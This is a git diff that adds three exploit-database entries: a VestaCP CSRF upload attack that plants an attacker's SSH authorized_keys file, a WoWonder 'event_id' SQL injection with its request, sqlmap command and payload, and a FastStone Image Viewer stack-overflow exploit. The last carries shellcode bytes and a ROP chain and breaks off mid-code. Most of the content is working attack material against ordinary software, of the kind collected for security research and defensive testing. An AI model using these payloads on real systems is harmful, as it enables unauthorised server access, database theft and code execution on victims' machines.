diff --git a/exploits/multiple/webapps/49659.html b/exploits/multiple/webapps/49659.html
new file mode 100644
index 000000000..7de410c75
--- /dev/null
+++ b/exploits/multiple/webapps/49659.html
@@ -0,0 +1,50 @@
+# Exploit Title: VestaCP 0.9.8 - File Upload CSRF
+# Exploit Author: Fady Othman
+# Date: 16-03-2021
+# Vendor Homepage: https://vestacp.com/
+# Software Link: https://github.com/myvesta/vesta
+# Version: Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39
+# CVE ID: CVE-2021-28379
+# Patch: https://github.com/myvesta/vesta/commit/3402071e950e76b79fa8672a1e09b70d3860f355
+
+## Description
+I found that the checks performed by the upload functionality are insufficient, the upload functionality is vulnerable to CSRF, in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"), the later is the one that is important for this exploit to work.
+
+I was able to use this to create a ".ssh" folder in the admin home and upload "authorized_keys" file which allowed me to access the server later as "admin" using SSH.
+
+Since this relies on a *CSRF* the admin has to visit a link, please note that *sshd* is already installed by *VestaCP* when using the default installation script so no need to install it, also please note that files can be replaced so even if the admin has already added "authorized_keys" file, it will be replaced with the attacker's file.
+
+Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/"
+
+## Steps to reproduce.
+1. Install the latest version of VestaCP in your machine by following the instructions at https://vestacp.com/install/.
+2. Login as the admin in Firefox, then open "exploit.html".
+3. ssh into the machine using 'ssh -i id_rsa admin@victimmachine', now you have access as admin.
+
+# exploit.html
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/49657.txt b/exploits/php/webapps/49657.txt
new file mode 100644
index 000000000..919999046
--- /dev/null
+++ b/exploits/php/webapps/49657.txt
@@ -0,0 +1,27 @@
+# Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection
+# Date: 16.03.2021
+# Exploit Author: securityforeveryone.com
+# Author Mail: hello[AT]securityforeveryone.com
+# Vendor Homepage: https://www.wowonder.com/
+# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302
+# Version: < 3.1
+# Tested on: Linux/Windows
+
+DESCRIPTION
+
+In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter.
+
+The vulnerability is found in the "event_id" parameter in GET request sent to page requests.php.
+Example:
+/requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID
+
+if an attacker exploits this vulnerability, attacker may access private data in the database system.
+
+EXPLOITATION
+
+# GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1
+# Host: Target
+
+Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs
+
+Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF
\ No newline at end of file
diff --git a/exploits/windows/local/49660.py b/exploits/windows/local/49660.py
new file mode 100755
index 000000000..776858b33
--- /dev/null
+++ b/exploits/windows/local/49660.py
@@ -0,0 +1,176 @@
+# Exploit title: FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)
+# Exploit Author: Paolo Stagno
+# Date: 15/03/2020
+# Vendor Homepage: https://www.faststone.org/
+# Download: https://www.faststonesoft.net/DN/FSViewerSetup75.exe
+# https://github.com/VoidSec/Exploit-Development/tree/master/windows/x86/local/FastStone_Image_Viewer_v.7.5/
+# Version: 7.5
+# Tested on: Windows 10 Pro x64 v.1909 Build 18363.1256
+# Category: local exploit
+# Platform: windows
+
+# Module info :
+#----------------------------------------------------------------------------------------------------------------------
+#Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
+#----------------------------------------------------------------------------------------------------------------------
+#0x00400000 | 0x00abf000 | 0x006bf000 | False | False | False | False | False | 7.5.0.0 [FSViewer.exe] (C:\Program Files (x86)\FastStone Image Viewer\FSViewer.exe)
+#0x6ad80000 | 0x6adfe000 | 0x0007e000 | False | False | False | False | False | -1.0- [fsplugin05.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin05.dll)
+#0x6afb0000 | 0x6b011000 | 0x00061000 | True | True | False | False | False | -1.0- [fsplugin06.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin06.dll)
+#----------------------------------------------------------------------------------------------------------------------
+
+#!/usr/bin/python
+import struct, sys
+print("\n[>] FastStone Image Viewer v. <= 7.5 Exploit by VoidSec\n")
+
+filename="FSViewer_v.7.5_exploit.cur"
+
+###################################################################################
+# Shellcode
+# MAX Shellcode size: 556
+# ImageData - ROP NOP - Rop Chain - Stack Adjustment = 776 - 144 - 68 - 8 = 556
+# Custom calc.exe shellcode
+# size: 112
+###################################################################################
+
+shellcode=(
+ "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
+ "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
+ "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
+ "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
+ "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
+ "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
+ "\x45\x81\x3e\x43\x72\x65\x61\x75"
+ "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
+ "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
+ "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
+ "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
+ "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
+ "\x6c\x63\x89\xe2\x52\x52\x53\x53"
+ "\x53\x53\x53\x53\x52\x53\xff\xd7"
+)
+
+
+if (len(shellcode)>556):
+ sys.exit("Shellcode's size must be <= 556 bytes")
+
+###################################################################################
+# Cur File Format
+# ---------------------------------------------------------------------------------
+# | Reserved | Type | Image Count |
+# | 00 00 | 02 00 | 02 00 | <- CUR file will contains two images
+# Entries:
+# | Width | Height | ColorCount | Reserved | XHotSpot | YHotSpot | SizeInBytes | File Offset |
+# | 30 | 30 | 00 | 00 | 01 00 | 02 00 | 30 03 00 00 | 26 00 00 00 | <- we'll corrupt the first image with rop chain & shellcode
+# | 20 | 20 | 00 | 00 | 02 00 | 04 00 | E8 02 00 00 | 56 03 00 00 | <- while leaving the 2nd one "untouched" a part from the stack pivot (should leave the cursor preview intact)
+# 1st Image Info Header:
+# | Size | Width | Height | Planes | BitCount | Compression | ImageSize | XpixelsPerM | YpixelsPerM | Colors Used | ColorsImportant |
+# | 28 00 00 00 | 30 00 00 00 | 60 00 00 00 | 01 00 | 89 30 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 |
+# 1st ImageData(BLOB)
+# 2nd Image Info Header:
+# 2nd ImageData(BLOB)
+# ---------------------------------------------------------------------------------
+# BitCount will be used to read # number of bytes into a buffer triggering the buffer overflow
+# its value can be modified but we need to account for two operations happening into the software.
+# - SHL 1, 89 = 0x200
+# - SHL 200, 2 = 0x800 (2048d) number of bytes to be read from the file
+# we'll have to pad the image data to match it's size in bytes defined in the header SizeInBytes
+# ImageData = SizeInBytes - ImageInfoHeader Size (330h-28h=308h 776d)
+###################################################################################
+
+image_data_pad = 776
+
+def create_rop_nop():
+ rop_gadgets = [
+ 0x6adc5ab6, # 0x6adc5ab6 (RVA : 0x00045ab6) : # DEC ECX # RETN ** [fsplugin05.dll] ** | {PAGE_EXECUTE_READ}
+ ]
+ return ''.join(struct.pack(' ebx
+ #[---INFO:gadgets_to_set_edx:---]
+ 0x004798db, # POP EDX ; RETN [FSViewer.exe]
+ 0x00000040, # 0x00000040-> edx
+ #[---INFO:gadgets_to_set_ecx:---]
+ 0x004c7832, # POP ECX ; RETN [FSViewer.exe]
+ 0x00991445, # &Writable location [FSViewer.exe]
+ #[---INFO:gadgets_to_set_edi:---]
+ 0x0040c3a8, # POP EDI ; RETN [FSViewer.exe]
+ 0x0057660b, # RETN (ROP NOP) [FSViewer.exe]
+ #[---INFO:gadgets_to_set_eax:---]
+ 0x00404243, # POP EAX ; RETN [FSViewer.exe]
+ 0x90909090, # nop
+ #[---INFO:pushad:---]
+ 0x6adc21bf, # PUSHAD # RETN [fsplugin05.dll]
+ ]
+ return ''.join(struct.pack('